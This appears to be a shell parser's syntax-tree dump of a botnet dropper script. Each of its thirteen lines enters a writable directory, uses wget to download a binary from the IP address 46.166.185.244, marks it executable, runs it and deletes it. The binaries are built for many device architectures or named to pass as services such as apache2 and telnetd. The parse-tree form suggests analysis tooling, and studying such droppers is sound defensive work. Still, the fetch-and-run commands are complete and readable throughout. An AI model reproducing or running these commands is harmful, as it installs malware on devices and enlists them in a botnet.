ListNode(lineno=2, pos=(12, 150), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://46.166.185.244/pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 121), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 121), word='pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 133), parts=[
    WordNode(lineno=2, pos=(123, 133), word='./pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 150), parts=[
    WordNode(lineno=2, pos=(135, 137), word='rm'),
    WordNode(lineno=2, pos=(138, 141), word='-rf'),
    WordNode(lineno=2, pos=(142, 150), word='pl0xmips'),
  ]),
])
ListNode(lineno=3, pos=(151, 297), parts=[
  CommandNode(lineno=3, pos=(151, 158), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 158), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 173), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 173), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 184), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 184), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(185, 187)),
  CommandNode(lineno=3, pos=(188, 196), parts=[
    WordNode(lineno=3, pos=(188, 190), word='cd'),
    WordNode(lineno=3, pos=(191, 196), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 204), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 204), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(204, 205)),
  CommandNode(lineno=3, pos=(206, 243), parts=[
    WordNode(lineno=3, pos=(206, 210), word='wget'),
    WordNode(lineno=3, pos=(211, 243), word='http://46.166.185.244/pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(243, 244)),
  CommandNode(lineno=3, pos=(245, 264), parts=[
    WordNode(lineno=3, pos=(245, 250), word='chmod'),
    WordNode(lineno=3, pos=(251, 253), word='+x'),
    WordNode(lineno=3, pos=(254, 264), word='pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(264, 265)),
  CommandNode(lineno=3, pos=(266, 278), parts=[
    WordNode(lineno=3, pos=(266, 278), word='./pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(278, 279)),
  CommandNode(lineno=3, pos=(280, 297), parts=[
    WordNode(lineno=3, pos=(280, 282), word='rm'),
    WordNode(lineno=3, pos=(283, 286), word='-rf'),
    WordNode(lineno=3, pos=(287, 297), word='pl0xmipsel'),
  ]),
])
ListNode(lineno=4, pos=(298, 432), parts=[
  CommandNode(lineno=4, pos=(298, 305), parts=[
    WordNode(lineno=4, pos=(298, 300), word='cd'),
    WordNode(lineno=4, pos=(301, 305), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 320), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 320), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(321, 323)),
  CommandNode(lineno=4, pos=(324, 331), parts=[
    WordNode(lineno=4, pos=(324, 326), word='cd'),
    WordNode(lineno=4, pos=(327, 331), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(332, 334)),
  CommandNode(lineno=4, pos=(335, 343), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 343), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(344, 346)),
  CommandNode(lineno=4, pos=(347, 351), parts=[
    WordNode(lineno=4, pos=(347, 349), word='cd'),
    WordNode(lineno=4, pos=(350, 351), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(351, 352)),
  CommandNode(lineno=4, pos=(353, 387), parts=[
    WordNode(lineno=4, pos=(353, 357), word='wget'),
    WordNode(lineno=4, pos=(358, 387), word='http://46.166.185.244/pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(387, 388)),
  CommandNode(lineno=4, pos=(389, 405), parts=[
    WordNode(lineno=4, pos=(389, 394), word='chmod'),
    WordNode(lineno=4, pos=(395, 397), word='+x'),
    WordNode(lineno=4, pos=(398, 405), word='pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(405, 406)),
  CommandNode(lineno=4, pos=(407, 416), parts=[
    WordNode(lineno=4, pos=(407, 416), word='./pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(416, 417)),
  CommandNode(lineno=4, pos=(418, 432), parts=[
    WordNode(lineno=4, pos=(418, 420), word='rm'),
    WordNode(lineno=4, pos=(421, 424), word='-rf'),
    WordNode(lineno=4, pos=(425, 432), word='pl0xsh4'),
  ]),
])
ListNode(lineno=5, pos=(433, 567), parts=[
  CommandNode(lineno=5, pos=(433, 440), parts=[
    WordNode(lineno=5, pos=(433, 435), word='cd'),
    WordNode(lineno=5, pos=(436, 440), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(441, 443)),
  CommandNode(lineno=5, pos=(444, 455), parts=[
    WordNode(lineno=5, pos=(444, 446), word='cd'),
    WordNode(lineno=5, pos=(447, 455), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(456, 458)),
  CommandNode(lineno=5, pos=(459, 466), parts=[
    WordNode(lineno=5, pos=(459, 461), word='cd'),
    WordNode(lineno=5, pos=(462, 466), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(467, 469)),
  CommandNode(lineno=5, pos=(470, 478), parts=[
    WordNode(lineno=5, pos=(470, 472), word='cd'),
    WordNode(lineno=5, pos=(473, 478), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(479, 481)),
  CommandNode(lineno=5, pos=(482, 486), parts=[
    WordNode(lineno=5, pos=(482, 484), word='cd'),
    WordNode(lineno=5, pos=(485, 486), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 522), parts=[
    WordNode(lineno=5, pos=(488, 492), word='wget'),
    WordNode(lineno=5, pos=(493, 522), word='http://46.166.185.244/pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(522, 523)),
  CommandNode(lineno=5, pos=(524, 540), parts=[
    WordNode(lineno=5, pos=(524, 529), word='chmod'),
    WordNode(lineno=5, pos=(530, 532), word='+x'),
    WordNode(lineno=5, pos=(533, 540), word='pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(540, 541)),
  CommandNode(lineno=5, pos=(542, 551), parts=[
    WordNode(lineno=5, pos=(542, 551), word='./pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(551, 552)),
  CommandNode(lineno=5, pos=(553, 567), parts=[
    WordNode(lineno=5, pos=(553, 555), word='rm'),
    WordNode(lineno=5, pos=(556, 559), word='-rf'),
    WordNode(lineno=5, pos=(560, 567), word='pl0xx64'),
  ]),
])
ListNode(lineno=6, pos=(568, 718), parts=[
  CommandNode(lineno=6, pos=(568, 575), parts=[
    WordNode(lineno=6, pos=(568, 570), word='cd'),
    WordNode(lineno=6, pos=(571, 575), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(576, 578)),
  CommandNode(lineno=6, pos=(579, 590), parts=[
    WordNode(lineno=6, pos=(579, 581), word='cd'),
    WordNode(lineno=6, pos=(582, 590), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(591, 593)),
  CommandNode(lineno=6, pos=(594, 601), parts=[
    WordNode(lineno=6, pos=(594, 596), word='cd'),
    WordNode(lineno=6, pos=(597, 601), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(602, 604)),
  CommandNode(lineno=6, pos=(605, 613), parts=[
    WordNode(lineno=6, pos=(605, 607), word='cd'),
    WordNode(lineno=6, pos=(608, 613), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(614, 616)),
  CommandNode(lineno=6, pos=(617, 621), parts=[
    WordNode(lineno=6, pos=(617, 619), word='cd'),
    WordNode(lineno=6, pos=(620, 621), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(621, 622)),
  CommandNode(lineno=6, pos=(623, 661), parts=[
    WordNode(lineno=6, pos=(623, 627), word='wget'),
    WordNode(lineno=6, pos=(628, 661), word='http://46.166.185.244/kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(661, 662)),
  CommandNode(lineno=6, pos=(663, 683), parts=[
    WordNode(lineno=6, pos=(663, 668), word='chmod'),
    WordNode(lineno=6, pos=(669, 671), word='+x'),
    WordNode(lineno=6, pos=(672, 683), word='kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(683, 684)),
  CommandNode(lineno=6, pos=(685, 698), parts=[
    WordNode(lineno=6, pos=(685, 698), word='./kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(698, 699)),
  CommandNode(lineno=6, pos=(700, 718), parts=[
    WordNode(lineno=6, pos=(700, 702), word='rm'),
    WordNode(lineno=6, pos=(703, 706), word='-rf'),
    WordNode(lineno=6, pos=(707, 718), word='kittyphones'),
  ]),
])
ListNode(lineno=7, pos=(719, 857), parts=[
  CommandNode(lineno=7, pos=(719, 726), parts=[
    WordNode(lineno=7, pos=(719, 721), word='cd'),
    WordNode(lineno=7, pos=(722, 726), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(727, 729)),
  CommandNode(lineno=7, pos=(730, 741), parts=[
    WordNode(lineno=7, pos=(730, 732), word='cd'),
    WordNode(lineno=7, pos=(733, 741), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(742, 744)),
  CommandNode(lineno=7, pos=(745, 752), parts=[
    WordNode(lineno=7, pos=(745, 747), word='cd'),
    WordNode(lineno=7, pos=(748, 752), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(753, 755)),
  CommandNode(lineno=7, pos=(756, 764), parts=[
    WordNode(lineno=7, pos=(756, 758), word='cd'),
    WordNode(lineno=7, pos=(759, 764), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(765, 767)),
  CommandNode(lineno=7, pos=(768, 772), parts=[
    WordNode(lineno=7, pos=(768, 770), word='cd'),
    WordNode(lineno=7, pos=(771, 772), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(772, 773)),
  CommandNode(lineno=7, pos=(774, 809), parts=[
    WordNode(lineno=7, pos=(774, 778), word='wget'),
    WordNode(lineno=7, pos=(779, 809), word='http://46.166.185.244/pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(809, 810)),
  CommandNode(lineno=7, pos=(811, 828), parts=[
    WordNode(lineno=7, pos=(811, 816), word='chmod'),
    WordNode(lineno=7, pos=(817, 819), word='+x'),
    WordNode(lineno=7, pos=(820, 828), word='pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(828, 829)),
  CommandNode(lineno=7, pos=(830, 840), parts=[
    WordNode(lineno=7, pos=(830, 840), word='./pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(840, 841)),
  CommandNode(lineno=7, pos=(842, 857), parts=[
    WordNode(lineno=7, pos=(842, 844), word='rm'),
    WordNode(lineno=7, pos=(845, 848), word='-rf'),
    WordNode(lineno=7, pos=(849, 857), word='pl0xi686'),
  ]),
])
ListNode(lineno=8, pos=(858, 992), parts=[
  CommandNode(lineno=8, pos=(858, 865), parts=[
    WordNode(lineno=8, pos=(858, 860), word='cd'),
    WordNode(lineno=8, pos=(861, 865), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(866, 868)),
  CommandNode(lineno=8, pos=(869, 880), parts=[
    WordNode(lineno=8, pos=(869, 871), word='cd'),
    WordNode(lineno=8, pos=(872, 880), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(881, 883)),
  CommandNode(lineno=8, pos=(884, 891), parts=[
    WordNode(lineno=8, pos=(884, 886), word='cd'),
    WordNode(lineno=8, pos=(887, 891), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(892, 894)),
  CommandNode(lineno=8, pos=(895, 903), parts=[
    WordNode(lineno=8, pos=(895, 897), word='cd'),
    WordNode(lineno=8, pos=(898, 903), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(904, 906)),
  CommandNode(lineno=8, pos=(907, 911), parts=[
    WordNode(lineno=8, pos=(907, 909), word='cd'),
    WordNode(lineno=8, pos=(910, 911), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(911, 912)),
  CommandNode(lineno=8, pos=(913, 947), parts=[
    WordNode(lineno=8, pos=(913, 917), word='wget'),
    WordNode(lineno=8, pos=(918, 947), word='http://46.166.185.244/pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(947, 948)),
  CommandNode(lineno=8, pos=(949, 965), parts=[
    WordNode(lineno=8, pos=(949, 954), word='chmod'),
    WordNode(lineno=8, pos=(955, 957), word='+x'),
    WordNode(lineno=8, pos=(958, 965), word='pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(965, 966)),
  CommandNode(lineno=8, pos=(967, 976), parts=[
    WordNode(lineno=8, pos=(967, 976), word='./pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(976, 977)),
  CommandNode(lineno=8, pos=(978, 992), parts=[
    WordNode(lineno=8, pos=(978, 980), word='rm'),
    WordNode(lineno=8, pos=(981, 984), word='-rf'),
    WordNode(lineno=8, pos=(985, 992), word='pl0xppc'),
  ]),
])
ListNode(lineno=9, pos=(993, 1111), parts=[
  CommandNode(lineno=9, pos=(993, 1000), parts=[
    WordNode(lineno=9, pos=(993, 995), word='cd'),
    WordNode(lineno=9, pos=(996, 1000), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1001, 1003)),
  CommandNode(lineno=9, pos=(1004, 1015), parts=[
    WordNode(lineno=9, pos=(1004, 1006), word='cd'),
    WordNode(lineno=9, pos=(1007, 1015), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1016, 1018)),
  CommandNode(lineno=9, pos=(1019, 1026), parts=[
    WordNode(lineno=9, pos=(1019, 1021), word='cd'),
    WordNode(lineno=9, pos=(1022, 1026), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1027, 1029)),
  CommandNode(lineno=9, pos=(1030, 1038), parts=[
    WordNode(lineno=9, pos=(1030, 1032), word='cd'),
    WordNode(lineno=9, pos=(1033, 1038), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1039, 1041)),
  CommandNode(lineno=9, pos=(1042, 1046), parts=[
    WordNode(lineno=9, pos=(1042, 1044), word='cd'),
    WordNode(lineno=9, pos=(1045, 1046), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1046, 1047)),
  CommandNode(lineno=9, pos=(1048, 1078), parts=[
    WordNode(lineno=9, pos=(1048, 1052), word='wget'),
    WordNode(lineno=9, pos=(1053, 1078), word='http://46.166.185.244/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1078, 1079)),
  CommandNode(lineno=9, pos=(1080, 1092), parts=[
    WordNode(lineno=9, pos=(1080, 1085), word='chmod'),
    WordNode(lineno=9, pos=(1086, 1088), word='+x'),
    WordNode(lineno=9, pos=(1089, 1092), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1092, 1093)),
  CommandNode(lineno=9, pos=(1094, 1099), parts=[
    WordNode(lineno=9, pos=(1094, 1099), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1099, 1100)),
  CommandNode(lineno=9, pos=(1101, 1111), parts=[
    WordNode(lineno=9, pos=(1101, 1103), word='rm'),
    WordNode(lineno=9, pos=(1104, 1107), word='-rf'),
    WordNode(lineno=9, pos=(1108, 1111), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1112, 1234), parts=[
  CommandNode(lineno=10, pos=(1112, 1119), parts=[
    WordNode(lineno=10, pos=(1112, 1114), word='cd'),
    WordNode(lineno=10, pos=(1115, 1119), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1120, 1122)),
  CommandNode(lineno=10, pos=(1123, 1134), parts=[
    WordNode(lineno=10, pos=(1123, 1125), word='cd'),
    WordNode(lineno=10, pos=(1126, 1134), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1135, 1137)),
  CommandNode(lineno=10, pos=(1138, 1145), parts=[
    WordNode(lineno=10, pos=(1138, 1140), word='cd'),
    WordNode(lineno=10, pos=(1141, 1145), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1146, 1148)),
  CommandNode(lineno=10, pos=(1149, 1157), parts=[
    WordNode(lineno=10, pos=(1149, 1151), word='cd'),
    WordNode(lineno=10, pos=(1152, 1157), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1158, 1160)),
  CommandNode(lineno=10, pos=(1161, 1165), parts=[
    WordNode(lineno=10, pos=(1161, 1163), word='cd'),
    WordNode(lineno=10, pos=(1164, 1165), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1165, 1166)),
  CommandNode(lineno=10, pos=(1167, 1198), parts=[
    WordNode(lineno=10, pos=(1167, 1171), word='wget'),
    WordNode(lineno=10, pos=(1172, 1198), word='http://46.166.185.244/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1198, 1199)),
  CommandNode(lineno=10, pos=(1200, 1213), parts=[
    WordNode(lineno=10, pos=(1200, 1205), word='chmod'),
    WordNode(lineno=10, pos=(1206, 1208), word='+x'),
    WordNode(lineno=10, pos=(1209, 1213), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1213, 1214)),
  CommandNode(lineno=10, pos=(1215, 1221), parts=[
    WordNode(lineno=10, pos=(1215, 1221), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1221, 1222)),
  CommandNode(lineno=10, pos=(1223, 1234), parts=[
    WordNode(lineno=10, pos=(1223, 1225), word='rm'),
    WordNode(lineno=10, pos=(1226, 1229), word='-rf'),
    WordNode(lineno=10, pos=(1230, 1234), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1235, 1377), parts=[
  CommandNode(lineno=11, pos=(1235, 1242), parts=[
    WordNode(lineno=11, pos=(1235, 1237), word='cd'),
    WordNode(lineno=11, pos=(1238, 1242), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1243, 1245)),
  CommandNode(lineno=11, pos=(1246, 1257), parts=[
    WordNode(lineno=11, pos=(1246, 1248), word='cd'),
    WordNode(lineno=11, pos=(1249, 1257), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1258, 1260)),
  CommandNode(lineno=11, pos=(1261, 1268), parts=[
    WordNode(lineno=11, pos=(1261, 1263), word='cd'),
    WordNode(lineno=11, pos=(1264, 1268), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1269, 1271)),
  CommandNode(lineno=11, pos=(1272, 1280), parts=[
    WordNode(lineno=11, pos=(1272, 1274), word='cd'),
    WordNode(lineno=11, pos=(1275, 1280), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1281, 1283)),
  CommandNode(lineno=11, pos=(1284, 1288), parts=[
    WordNode(lineno=11, pos=(1284, 1286), word='cd'),
    WordNode(lineno=11, pos=(1287, 1288), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1288, 1289)),
  CommandNode(lineno=11, pos=(1290, 1326), parts=[
    WordNode(lineno=11, pos=(1290, 1294), word='wget'),
    WordNode(lineno=11, pos=(1295, 1326), word='http://46.166.185.244/pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1326, 1327)),
  CommandNode(lineno=11, pos=(1328, 1346), parts=[
    WordNode(lineno=11, pos=(1328, 1333), word='chmod'),
    WordNode(lineno=11, pos=(1334, 1336), word='+x'),
    WordNode(lineno=11, pos=(1337, 1346), word='pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1346, 1347)),
  CommandNode(lineno=11, pos=(1348, 1359), parts=[
    WordNode(lineno=11, pos=(1348, 1359), word='./pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1359, 1360)),
  CommandNode(lineno=11, pos=(1361, 1377), parts=[
    WordNode(lineno=11, pos=(1361, 1363), word='rm'),
    WordNode(lineno=11, pos=(1364, 1367), word='-rf'),
    WordNode(lineno=11, pos=(1368, 1377), word='pl0xsparc'),
  ]),
])
ListNode(lineno=12, pos=(1378, 1496), parts=[
  CommandNode(lineno=12, pos=(1378, 1385), parts=[
    WordNode(lineno=12, pos=(1378, 1380), word='cd'),
    WordNode(lineno=12, pos=(1381, 1385), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1386, 1388)),
  CommandNode(lineno=12, pos=(1389, 1400), parts=[
    WordNode(lineno=12, pos=(1389, 1391), word='cd'),
    WordNode(lineno=12, pos=(1392, 1400), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1401, 1403)),
  CommandNode(lineno=12, pos=(1404, 1411), parts=[
    WordNode(lineno=12, pos=(1404, 1406), word='cd'),
    WordNode(lineno=12, pos=(1407, 1411), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1412, 1414)),
  CommandNode(lineno=12, pos=(1415, 1423), parts=[
    WordNode(lineno=12, pos=(1415, 1417), word='cd'),
    WordNode(lineno=12, pos=(1418, 1423), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1424, 1426)),
  CommandNode(lineno=12, pos=(1427, 1431), parts=[
    WordNode(lineno=12, pos=(1427, 1429), word='cd'),
    WordNode(lineno=12, pos=(1430, 1431), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1431, 1432)),
  CommandNode(lineno=12, pos=(1433, 1463), parts=[
    WordNode(lineno=12, pos=(1433, 1437), word='wget'),
    WordNode(lineno=12, pos=(1438, 1463), word='http://46.166.185.244/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1463, 1464)),
  CommandNode(lineno=12, pos=(1465, 1477), parts=[
    WordNode(lineno=12, pos=(1465, 1470), word='chmod'),
    WordNode(lineno=12, pos=(1471, 1473), word='+x'),
    WordNode(lineno=12, pos=(1474, 1477), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1477, 1478)),
  CommandNode(lineno=12, pos=(1479, 1484), parts=[
    WordNode(lineno=12, pos=(1479, 1484), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1484, 1485)),
  CommandNode(lineno=12, pos=(1486, 1496), parts=[
    WordNode(lineno=12, pos=(1486, 1488), word='rm'),
    WordNode(lineno=12, pos=(1489, 1492), word='-rf'),
    WordNode(lineno=12, pos=(1493, 1496), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1497, 1631), parts=[
  CommandNode(lineno=13, pos=(1497, 1504), parts=[
    WordNode(lineno=13, pos=(1497, 1499), word='cd'),
    WordNode(lineno=13, pos=(1500, 1504), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1505, 1507)),
  CommandNode(lineno=13, pos=(1508, 1519), parts=[
    WordNode(lineno=13, pos=(1508, 1510), word='cd'),
    WordNode(lineno=13, pos=(1511, 1519), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1520, 1522)),
  CommandNode(lineno=13, pos=(1523, 1530), parts=[
    WordNode(lineno=13, pos=(1523, 1525), word='cd'),
    WordNode(lineno=13, pos=(1526, 1530), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1531, 1533)),
  CommandNode(lineno=13, pos=(1534, 1542), parts=[
    WordNode(lineno=13, pos=(1534, 1536), word='cd'),
    WordNode(lineno=13, pos=(1537, 1542), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1543, 1545)),
  CommandNode(lineno=13, pos=(1546, 1550), parts=[
    WordNode(lineno=13, pos=(1546, 1548), word='cd'),
    WordNode(lineno=13, pos=(1549, 1550), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1550, 1551)),
  CommandNode(lineno=13, pos=(1552, 1586), parts=[
    WordNode(lineno=13, pos=(1552, 1556), word='wget'),
    WordNode(lineno=13, pos=(1557, 1586), word='http://46.166.185.244/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1586, 1587)),
  CommandNode(lineno=13, pos=(1588, 1604), parts=[
    WordNode(lineno=13, pos=(1588, 1593), word='chmod'),
    WordNode(lineno=13, pos=(1594, 1596), word='+x'),
    WordNode(lineno=13, pos=(1597, 1604), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1604, 1605)),
  CommandNode(lineno=13, pos=(1606, 1615), parts=[
    WordNode(lineno=13, pos=(1606, 1615), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1615, 1616)),
  CommandNode(lineno=13, pos=(1617, 1631), parts=[
    WordNode(lineno=13, pos=(1617, 1619), word='rm'),
    WordNode(lineno=13, pos=(1620, 1623), word='-rf'),
    WordNode(lineno=13, pos=(1624, 1631), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1632, 1766), parts=[
  CommandNode(lineno=14, pos=(1632, 1639), parts=[
    WordNode(lineno=14, pos=(1632, 1634), word='cd'),
    WordNode(lineno=14, pos=(1635, 1639), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1640, 1642)),
  CommandNode(lineno=14, pos=(1643, 1654), parts=[
    WordNode(lineno=14, pos=(1643, 1645), word='cd'),
    WordNode(lineno=14, pos=(1646, 1654), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1655, 1657)),
  CommandNode(lineno=14, pos=(1658, 1665), parts=[
    WordNode(lineno=14, pos=(1658, 1660), word='cd'),
    WordNode(lineno=14, pos=(1661, 1665), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1666, 1668)),
  CommandNode(lineno=14, pos=(1669, 1677), parts=[
    WordNode(lineno=14, pos=(1669, 1671), word='cd'),
    WordNode(lineno=14, pos=(1672, 1677), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1678, 1680)),
  CommandNode(lineno=14, pos=(1681, 1685), parts=[
    WordNode(lineno=14, pos=(1681, 1683), word='cd'),
    WordNode(lineno=14, pos=(1684, 1685), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1685, 1686)),
  CommandNode(lineno=14, pos=(1687, 1721), parts=[
    WordNode(lineno=14, pos=(1687, 1691), word='wget'),
    WordNode(lineno=14, pos=(1692, 1721), word='http://46.166.185.244/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1721, 1722)),
  CommandNode(lineno=14, pos=(1723, 1739), parts=[
    WordNode(lineno=14, pos=(1723, 1728), word='chmod'),
    WordNode(lineno=14, pos=(1729, 1731), word='+x'),
    WordNode(lineno=14, pos=(1732, 1739), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1739, 1740)),
  CommandNode(lineno=14, pos=(1741, 1750), parts=[
    WordNode(lineno=14, pos=(1741, 1750), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1750, 1751)),
  CommandNode(lineno=14, pos=(1752, 1766), parts=[
    WordNode(lineno=14, pos=(1752, 1754), word='rm'),
    WordNode(lineno=14, pos=(1755, 1758), word='-rf'),
    WordNode(lineno=14, pos=(1759, 1766), word='telnetd'),
  ]),
])
